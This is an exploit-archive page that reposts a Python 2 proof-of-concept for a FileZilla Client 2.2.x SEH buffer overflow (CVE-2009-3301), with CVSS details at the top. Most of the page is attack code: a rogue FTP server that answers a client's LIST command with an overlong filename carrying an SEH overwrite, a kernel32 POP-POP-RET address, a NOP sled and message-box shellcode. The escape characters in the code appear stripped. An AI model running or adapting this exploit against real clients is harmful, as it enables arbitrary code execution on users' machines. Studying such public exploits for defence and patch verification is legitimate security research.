FileZilla Client 2.2.x SEH Buffer Overflow
CVE
Category
Price
Severity
CVE-2009-3301
CWE-119
$1500
High
Author
Risk
Exploitation Type
Date
Jeremy Brown
High
Local
2015-08-09
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015080045 Below is a copy:FileZilla Client 2.2.x SEH Buffer Overflow # Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit
# Date: 02/08/2015
# Exploit Author: ly0n
# Vendor Homepage: filezilla-project.org/
# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90
# Version: tested on filezilla 2.2.21
# Tested on: Windows XP sp3 english
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
# visit: ly0n.me
# greetz: NBS
#MSGBOX "BrokenByte"
msgbox = ("x68x6ex33x72x00x68x75x74"
"x69x30x68x5ex58x65x63x89"
"xe3x68x20x20x20x00x68x68"
"x65x72x65x68x77x61x73x20"
"x68x6ex33x72x20x68x75x74"
"x69x30x68x5ex58x65x63x89"
"xe1x31xc0x50x53x51x50x50"
"xbexeax07x45x7exffxe6x31"
"xc0x50xb8x12xcbx81x7cxff"
"xe0")
nops = "x90" * 100
#77EA9CAC POP POP RET kernel32.dll <- seh
#EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh
nseh = "xebx06x90x90"
seh = "xACx9CxEAx77"
allow_delete = False
local_ip = "192.168.11.6" #SERVER LOCAL IP
local_port = 21 #DESIRED PORT
buffer1 = "x41" * 1896 + nseh + seh + nops + msgbox + nops
buffer = buffer1 + ".txt"
currdir=os.path.abspath('.')
class FTPserverThread(threading.Thread):
def __init__(self,(conn,addr)):
self.conn=conn
self.addr=addr
self.basewd=currdir
self.cwd=self.basewd
self.rest=False
self.pasv_mode=False
threading.Thread.__init__(self)
def run(self):
self.conn.send('220 Welcome!rn')
while True:
cmd=self.conn.recv(256)
if not cmd: break
else:
print 'Recieved:',cmd
try:
func=getattr(self,cmd[:4].strip().upper())
func(cmd)
except Exception,e:
print 'ERROR:',e
#traceback.print_exc()
self.conn.send('500 Sorry.rn')
def SYST(self,cmd):
self.conn.send('215 UNIX Type: L8rn')
def OPTS(self,cmd):
if cmd[5:-2].upper()=='UTF8 ON':
self.conn.send('200 OK.rn')
else:
self.conn.send('451 Sorry.rn')
def USER(self,cmd):
self.conn.send('331 OK.rn')
def PASS(self,cmd):
self.conn.send('230 OK.rn')
#self.conn.send('530 Incorrect.rn')
def QUIT(self,cmd):
self.conn.send('221 Goodbye.rn')
def NOOP(self,cmd):
self.conn.send('200 OK.rn')
def TYPE(self,cmd):
self.mode=cmd[5]
self.conn.send('200 Binary mode.rn')
def CDUP(self,cmd):
if not os.path.samefile(self.cwd,self.basewd):
#learn from stackoverflow
self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
self.conn.send('200 OK.rn')
def PWD(self,cmd):
cwd=os.path.relpath(self.cwd,self.basewd)
if cwd=='.':
cwd='/'
else:
cwd='/'+cwd
self.conn.send('257 "%s"rn' % cwd)
def CWD(self,cmd):
chwd=cmd[4:-2]
if chwd=='/':
self.cwd=self.basewd
elif chwd[0]=='/':
self.cwd=os.path.join(self.basewd,chwd[1:])
else:
self.cwd=os.path.join(self.cwd,chwd)
self.conn.send('250 OK.rn')
def PORT(self,cmd):
if self.pasv_mode:
self.servsock.close()
self.pasv_mode = False
l=cmd[5:].split(',')
self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.rn')
def PASV(self,cmd): # from http://goo.gl/3if2U
self.pasv_mode = True
self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.servsock.bind((local_ip,0))
self.servsock.listen(1)
ip, port = self.servsock.getsockname()
print 'open', ip, port
self.conn.send('227 Entering Passive Mode (%s,%u,%u).rn' %
(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
def start_datasock(self):
if self.pasv_mode:
self.datasock, addr = self.servsock.accept()
print 'connect:', addr
else:
self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.datasock.connect((self.dataAddr,self.dataPort))
def stop_datasock(self):
self.datasock.close()
if self.pasv_mode:
self.servsock.close()
def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.rn')
print 'list:', self.cwd
self.start_datasock()
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"rnn"
dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" rnn"
self.datasock.send("total 2rn"+dirlist)
self.stop_datasock()
self.conn.send('226 Directory send OK.rn')
def toListItem(self,fn):
st=os.stat(fn)
fullmode='rwxrwxrwx'
mode=''
for i in range(9):
mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
d=(os.path.isdir(fn)) and 'd' or '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
def MKD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
os.mkdir(dn)
self.conn.send('257 Directory created.rn')
def RMD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
if allow_delete:
os.rmdir(dn)
self.conn.send('250 Directory deleted.rn')
else:
self.conn.send('450 Not allowed.rn')
def DELE(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
if allow_delete:
os.remove(fn)
self.conn.send('250 File deleted.rn')
else:
self.conn.send('450 Not allowed.rn')
def RNFR(self,cmd):
self.rnfn=os.path.join(self.cwd,cmd[5:-2])
self.conn.send('350 Ready.rn')
def RNTO(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
os.rename(self.rnfn,fn)
self.conn.send('250 File renamed.rn')
def REST(self,cmd):
self.pos=int(cmd[5:-2])
self.rest=True
self.conn.send('250 File position reseted.rn')
def RETR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
#fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
print 'Downlowding:',fn
if self.mode=='I':
fi=open(fn,'rb')
else:
fi=open(fn,'r')
self.conn.send('150 Opening data connection.rn')
if self.rest:
fi.seek(self.pos)
self.rest=False
data= fi.read(1024)
self.start_datasock()
while data:
self.datasock.send(data)
data=fi.read(1024)
fi.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.rn')
def STOR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
print 'Uplaoding:',fn
if self.mode=='I':
fo=open(fn,'wb')
else:
fo=open(fn,'w')
self.conn.send('150 Opening data connection.rn')
self.start_datasock()
while True:
data=self.datasock.recv(1024)
if not data: break
fo.write(data)
fo.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.rn')
class FTPserver(threading.Thread):
def __init__(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((local_ip,local_port))
threading.Thread.__init__(self)
def run(self):
self.sock.listen(5)
while True:
th=FTPserverThread(self.sock.accept())
th.daemon=True
th.start()
def stop(self):
self.sock.close()
if __name__=='__main__':
ftp=FTPserver()
ftp.daemon=True
ftp.start()
print 'On', local_ip, ':', local_port
raw_input('Enter to end...n')
ftp.stop()
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum